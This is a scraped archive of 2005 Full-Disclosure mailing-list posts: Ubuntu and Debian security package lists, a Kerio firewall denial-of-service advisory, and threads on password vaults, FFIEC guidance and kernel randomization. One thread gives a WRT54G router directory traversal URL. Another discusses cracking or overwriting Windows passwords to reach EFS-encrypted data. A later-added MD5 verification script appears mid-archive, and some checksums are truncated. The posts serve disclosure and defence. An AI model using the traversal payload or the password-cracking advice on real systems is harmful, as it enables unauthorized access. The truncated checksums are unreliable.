http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3.diff.gz
  Size/MD5:53513 e4e2d3d54c83a168e82d70b137ee057c

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3.dsc
  Size/MD5: 1157 037c7c524016edeaa473c6c0d062bce8

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05.orig.tar.gz
  Size/MD5: 21903248 665596f852d4e8d0c31c17fc292d6b29

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-doc_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:  4085668 6e2e530a16e993ad086d42956c5803c2

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-help_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:   543156 8bc408bd3ad1e666e5e357ae36e53932

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/xfonts-abi_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:16596 75430c23dad8ae4d0a7308265d408003

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1455334 d7e4f6e69c1b7a447efceaf04ff68ea0

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1989318 c268d65eb11b0b52fb60dcc9ba5bedd1

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:26802 b4fa13f3573367b2015988d4f18dc614

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:   367222 6474c5943df1fce5bead6694a1261d6a

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1991322 1af7def6dd93a82d2cec1e88ec2d4b5c

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1453160 04cb3db059e360a88db13f1808559450

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1872762 5e1e82e05a66130fa20bea41fbe095a6

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:26478 f67599750d41755a8b78a04b1dbdde5f

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:   351082 7da163ac9814bafa7973403a2b8c1193

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1876422 e9d75623f08356390d4065d472f3c9c9

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1453644 555f171b5a2d416145ec6c6127dbc5d8

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1972602 46cbb19e7d0ba940af215f0db405bb14

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:27940 e9583dbfa15f30f45f6112d0f75a6236

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:   405638 170b9be3298268ec25ba858681a8fa16

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1977814 e1ae70a2581e791bd387132ff6ed48c3

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.2.2-1ubuntu2.2.diff.gz
  Size/MD5:   512286 4f9111c0c96189e819605417cef9

Re: [Full-disclosure] password vaults-

2005-10-13 Thread Bart Lansing
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Someone else suggests that this may just be a troll...but I'll
answer it anyway:

Google is your friend, David.  Try googling for "password storage"
and weed through the 186,000 hits until you find the product you
need.

Cheers

On Wed, 12 Oct 2005 08:02:04 -0700 David Royer
<[EMAIL PROTECTED]> wrote:
>Sorry for the very noob question, but I'm having very hard times
>finding such products.
> I have the pleasure and the incredible chance to support generic
>(shared admin) passwords. I'm looking for a commercial product to manage
>the distribution and protection of these passwords. Must be RSA
>compatible and Active Directory (LDAP, to retrieve info and allow
>access). Also must be able to support web (https) for users to log in
>and get the passwords they are allowed to see.
> Best regards!
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkNOZBEACgkQfw4CJpLBxOM4zgCdGmrlfefcpajJBeTofm73Z0JB6DgA
oL0whOvp1c48V/X3GhetVAc27F//
=1OYc
-END PGP SIGNATURE-






RE: [Full-disclosure] password vaults-

2005-10-13 Thread Madison, Marc
Are you talking about something like a password reset for the brilliant
end user, because somehow their password mysteriously doesn't work
anymore?  There are several vendors (Google something like automated
helpdesk password reset) that offer this type of technology, but they
will not show the end user's current password, just allow them to change
it.


>Sorry for the very noob question, but I'm having very hard times
>finding such products.
>I have the pleasure and the incredible chance to support generic
>(shared admin) passwords. I'm looking for a commercial product to
>manage the distribution and protection of these passwords. Must be RSA
>compatible and Active Directory (LDAP, to retrieve info and allow
>access). Also must be able to support web (https) for users to log in
>and get the passwords they are allowed to see.



RE: [Full-disclosure] NEW USA FFIES Guidance

2005-10-13 Thread Madison, Marc
Did you read the full notice?  This link was at the bottom:
http://www.ffiec.gov/pdf/authentication_guidance.pdf in which the FFIEC
defines several ways to authenticate end users, but as Lyal Collins
pointed out it is all based on your company's own risk assessment.


>For those that fall under US FFIEC governance, what are you doing to
>satisfy these requirements?  I'd like to think I have more options than
>running to the store to pick up my RSA keyfobs...  What about PKI?  Are
>there other options for web based apps?
>
>http://www.fdic.gov/news/news/financial/2005/fil10305.html
>
>C. DeBerry



[Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service

2005-10-13 Thread Piotr Bania



Kerio Technologies Kerio Personal Firewall and Kerio Server
Firewall FWDRV driver
Local denial of service
by Piotr Bania <[EMAIL PROTECTED]>
http://pb.specialised.info



Original location:
http://pb.specialised.info/all/adv/kerio-fwdrv-dos-adv.txt

Severity:           Low (local machine denial of service - BSOD)

Software affected:  Tested on Kerio Personal Firewall 4 (4.2.0) and
                    Kerio ServerFirewall version 1.1.1, however it is
                    highly possible that earlier versions are also
                    vulnerable.


I.  BACKGROUND

From kerio.com website:

"Kerio Personal Firewall represents smart, easy-to-use personal
 security technology that fully protects personal computers
 against hackers and internal misuse"

"Kerio ServerFirewall offers IT and security administrators a
 powerful and easy-to-use tool to protect their server systems
 from worms, buffer-overflow and other internet security
 threats."


II. DESCRIPTION 

FWDRV driver (core part of the firewall system) monitors all
programs that are trying to connect to the internet. While doing
necessary checks, FWDRV parses the Process Environment Block
(PEB) like the code shows:


;--SNIP
.text:0041C04E  mov ecx, [ebp+var_4]  ; ECX = PEB base
.text:0041C051  mov edx, [ecx+0Ch]; EDX = PEB_LDR_DATA
;--SNIP


However, while parsing the PEB, FWDRV doesn't check whether the memory
holding the Process Environment Block is accessible. This means that if
an attacker sets PAGE_NOACCESS or PAGE_GUARD protection on the PEB
block, FWDRV will cause a fatal exception and the machine will crash.


III. IMPACT

Sample scenario:
Calling the connect API function with PAGE_NOACCESS protection
previously set on the Process Environment Block will cause a local
machine crash.


IV. POC CODE

Sample POC code was released to vendor.


best regards,
Piotr Bania


--

Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://pb.specialised.info  - Key ID: 0xBE43AC33





[Full-disclosure] On the linux kernel and stack randomization

2005-10-13 Thread none none
When did the mainline linux kernel implement these
changes? I cannot find ANY discussion on these changes
on the LKML? If someone can point me in the right
direction for a discussion on this it would be helpful
thanks.


>in >=2.6.12
># sysctl kernel.randomize_va_space
># cat /proc/self/maps
>
>

>-ed





Re: [Full-disclosure] WRT54G directory traversal vulnerability

2005-10-13 Thread Thierry Zoller
Dear Shell,

S> http://192.168.1.1/apply.cgi?action=../
S> It loads the page after action
S> http://192.168.1.1/apply.cgi?action=../ returns the setup page
S> http://192.168.1.1/apply.cgi?action=../blah returns that the file does not 
exist

Could be reproduced while being authenticated.

-- 
Kind regards
Thierry Zoller
mailto:[EMAIL PROTECTED]




Re: [Full-disclosure] WRT54G directory traversal vulnerability

2005-10-13 Thread Thierry Zoller
Dear Shell,

S> I just found a vulnerability in Linksys WRT54G routers.
Could not reproduce, asks for BASIC authentication.

-- 
Thierry Zoller
mailto:[EMAIL PROTECTED]




[Full-disclosure] [SECURITY] [DSA 865-1] New hylafax packages fix insecure temporary files

2005-10-13 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 865-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 13th, 2005  http://www.debian.org/security/faq
- --

Package: hylafax
Vulnerability  : insecure temporary files
Problem type   : local
Debian-specific: no
CVE ID : CAN-2005-3069
CERT advisory  : 
BugTraq ID : 
Debian Bug : 

Javier Fernández-Sanguino Peña discovered that several scripts of the
hylafax suite, a flexible client/server fax software, create temporary
files and directories in an insecure fashion, leaving them vulnerable
to symlink exploits.

For the old stable distribution (woody) this problem has been fixed in
version 4.1.1-3.2.

For the stable distribution (sarge) this problem has been fixed in
version 4.2.1-5sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 4.2.2-1.

We recommend that you upgrade your hylafax packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-3.2.dsc
  Size/MD5 checksum:  739 a26715f7b967614e4aa3afb4657fb20e

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-3.2.diff.gz
  Size/MD5 checksum:   116099 ad9d74b7d995655df44c6a257cfb8e1f

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1.orig.tar.gz
  Size/MD5 checksum:  1287689 1ed081750be70a800708699b7568e17e

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-doc_4.1.1-3.2_all.deb
  Size/MD5 checksum:   318302 49ee14fc07e1ca12ea191ec01209831f

  Alpha architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_alpha.deb
  Size/MD5 checksum:   556336 2ca7177d8d4e45ad08052612d31e3286

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_alpha.deb
  Size/MD5 checksum:  1362414 98b7c46d94841981577a46965982daf3

  ARM architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_arm.deb
  Size/MD5 checksum:   445654 7fd22812bb3e50f5915a3d5ca56c3412

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_arm.deb
  Size/MD5 checksum:  1095664 3b56df8d25e56adbf657f35f6add331d

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_i386.deb
  Size/MD5 checksum:   462410 1b6ef2d2bc9a013abc3ca5c88d9517ef

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_i386.deb
  Size/MD5 checksum:  1132566 fe019575d929c90497da4da532dd0e14

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_ia64.deb
  Size/MD5 checksum:   615710 80614f594990528f32d72f29a25059aa

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_ia64.deb
  Size/MD5 checksum:  1491748 1fefde2f9ef1e1f29f2f3e538746e826

  HP Precision architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_hppa.deb
  Size/MD5 checksum:   501634 a6d82e052b47ec50dcb2074b97bc9118

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_hppa.deb
  Size/MD5 checksum:  1231286 21b6141ceb425b35dca9ba8350cea477

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_m68k.deb
  Size/MD5 checksum:   451276 e7bcefc8e040c5dd61993cce93f8463f

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_m68k.deb
  Size/MD5 checksum:  104 35967ff6911e340a8ad03677e314bdb6

  PowerPC architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_powerpc.deb
  Size/MD5 checksum:   450830 a81c00ffe35a3596f2a1cba944e25369

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_powerpc.deb
  Size/MD5 checksum:  1104318 49a486d5ad824024d1aee622f38bca9b

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_s390.deb
  Size/MD5 checksum:   441260 40081bae35
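
Both the Ubuntu notice (USN-203-1) and this Debian advisory list a Size/MD5 for every package and tell you to run `wget` then `dpkg -i`. As an added example that is neither project's own tooling, the shell function below verifies a downloaded file against the advisory's listed byte count and MD5 before it is handed to dpkg. It assumes GNU coreutils `md5sum` and `wc`; the sample file it creates is constructed so the check runs offline.

```shell
#!/bin/sh
# Added example (not part of USN-203-1 or DSA 865-1): verify a downloaded
# package against the Size/MD5 values an advisory lists before dpkg -i.
# Assumes GNU coreutils md5sum and wc.

# verify_pkg FILE EXPECTED_SIZE EXPECTED_MD5
# Returns 0 when both the byte count and the MD5 digest match, 1 otherwise.
verify_pkg() {
    file=$1; want_size=$2; want_md5=$3
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    have_size=$(wc -c < "$file" | tr -d ' ')
    have_md5=$(md5sum "$file" | cut -d' ' -f1)
    if [ "$have_size" != "$want_size" ]; then
        echo "size mismatch for $file: got $have_size, advisory says $want_size" >&2
        return 1
    fi
    if [ "$have_md5" != "$want_md5" ]; then
        echo "MD5 mismatch for $file: got $have_md5, advisory says $want_md5" >&2
        return 1
    fi
    echo "ok: $file matches advisory size and MD5"
    return 0
}

# make_sample
# Constructed stand-in for a downloaded .deb: 5 bytes ("hello") whose
# MD5 is 5d41402abc4b2a76b9719d911017c592, so the check runs offline.
make_sample() {
    sample=${TMPDIR:-/tmp}/fake-package-$$.deb
    printf 'hello' > "$sample"
    echo "$sample"
}

# With a real download the call uses the values printed in the advisory,
# e.g. for the i386 hylafax client listed above:
#   verify_pkg hylafax-client_4.1.1-3.2_i386.deb 462410 1b6ef2d2bc9a013abc3ca5c88d9517ef \
#       && dpkg -i hylafax-client_4.1.1-3.2_i386.deb
SAMPLE=$(make_sample)
verify_pkg "$SAMPLE" 5 5d41402abc4b2a76b9719d911017c592
rm -f "$SAMPLE"
```

Chaining `dpkg -i` behind `&&` means a truncated or tampered download is never installed; the size check catches partial transfers cheaply before the digest is computed.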

[Full-disclosure] Microsoft Outlook Web Access

2005-10-13 Thread Petko Petkov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Hello there,
I've been messing around with Microsoft Outlook Web Access (SP1)
trying to test and see what I can do. I found several vulnerabilities
on google/securityfocus related to this particular version but none of
them seem to work. I went to the Microsoft website and I can't see any
patches available. Well, there is one fix that I really don't know
what it is for.

Does anyone know if BID:12459 and BID:9409 have been fixed?
If not, is there a way to prevent those attacks from happening?

Thanks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)
 
iD8DBQFDTic+Ff/6vxAyUpgRAgWgAJ9d+hpQ650dOfoZiQljAFtfeZJJ5QCgv6bO
mCC1wAHPw4vcA1bKPe45KJY=
=+TZH
-END PGP SIGNATURE-



Re: [Full-disclosure] Microsoft EFS

2005-10-13 Thread Fco. Jose Garrido Matamoros
Look at this (a small guide to cracking, not overwriting, the cached domain password)

http://antionline.com/printthread.php?threadid=266698&pagenumber=1


On Wednesday, 12 October 2005 13:19, Fco. Jose Garrido Matamoros
wrote:
> Sorry for my english! I don't understand "nounce" password.
>
> You can try to crack the cached domain/active directory password (if the
> CachedLogonCounts isn't set to 0).
>
> Best regards
>
> On Tuesday, 11 October 2005 19:03, Dyke, Tim wrote:
> > > The DEFAULT recovery agent is the Administrator, on the other hand you
> >
> > always
> >
> > > can to decrypt the data from the userX login like that userX; So crack
> >
> > the
> >
> > > password or overwrite it off-line (the same for the delegated recovery
> > >
> > > agent).
> >
> > Tom wrote"
> > be careful:
> >
> > overwriting the pw offline will work with efs on w2k.
> > it will not work with winxp/2003: you cant access any efs-data after
> > resetting the password offline.
> >
> > you'll have to crack the users or the admins pw and either logon
> > interactively or export their keys to get access to the efs-encrypted
> > data.
> >
> > Tom"
> >
> > Do you know how his will work for a machine that is part of a Domain?
> > Where there are no Local Users and the Default Recovery Agent is the
> > "Domain Admin"
> >
> > I know that one can always hack the local admin PW, then unjoin the
> > domain, but where does that leave the machine.
> > Is there any way to hack the "nounce" PW?
> >
> > Thanks
> >
> > Tim

-- 
Fco. Jose Garrido Matamoros
Telecommunications Engineer

TecVD - Information Systems Security and Control
http://www.tecvd.com

NOTE: The accents in this message have been deliberately omitted to avoid
any alteration of the characters in the text.

